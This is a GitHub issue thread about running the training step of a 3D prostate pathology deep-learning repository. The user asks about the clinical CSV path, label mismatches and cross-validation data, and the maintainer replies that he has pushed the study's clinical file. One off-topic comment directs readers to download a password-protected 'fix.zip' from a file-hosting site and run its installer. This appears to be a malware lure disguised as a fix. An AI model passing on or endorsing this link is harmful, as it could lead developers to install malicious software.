### ISSUE TITLE
Some questions when runing Step 3: Training

### ISSUE THREAD

**Issue by Dylan-H-Wang** [mahmoodlab/mamba#5]
Hi

I have a few questions regarding Step 3. Could you please help clarify them when you have time?

1. In the [step 3](https://github.com/mahmoodlab/TriPath#step-3-training), the argument for `clinical_path` is not specified, I am assuming it refers to [csv/process_clinical_list.csv](https://github.com/mahmoodlab/TriPath/blob/main/csv/process_clinical_list.csv)?

Assuming [csv/process_clinical_list.csv](https://github.com/mahmoodlab/TriPath/blob/main/csv/process_clinical_list.csv) is correct for the `clinical_path` argument:
1. Based on the Supplementary Table 1 in [Prostate Cancer Risk Stratification via Nondestructive 3D Pathology with Deep Learning–Assisted Gland Analysis](https://aacrjournals.org/cancerres/article/82/2/334/675486/Prostate-Cancer-Risk-Stratification-via), the `BCR` category is `0` and `days` is `N/A`. However, in the [csv/process_clinical_list.csv](https://github.com/mahmoodlab/TriPath/blob/main/csv/process_clinical_list.csv), the BCR is `Yes` and `BCR_days` is `100`. Is this csv file for trivial demo only or actual training labels?
2. Is that possible to obtain all clinical list csv file for OTLS dataset?
3. Current files in `/csv` contain only one slide sample which is not enough to run Step 3 requiring over 2 slide samples for cross validation.

Thank you for the help!

Kind regards
Dylan

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andrewsong90** [comment]
Hi @Dylan-H-Wang,

I have just pushed the clinical list file that I used for my study. It should b in `csv/process_clinical_list.csv` 
Hopefully this resolves all the questions you had in this issue!

Let me know if you need anything and thank you so much for your patience thus far.

Best,
Andrew
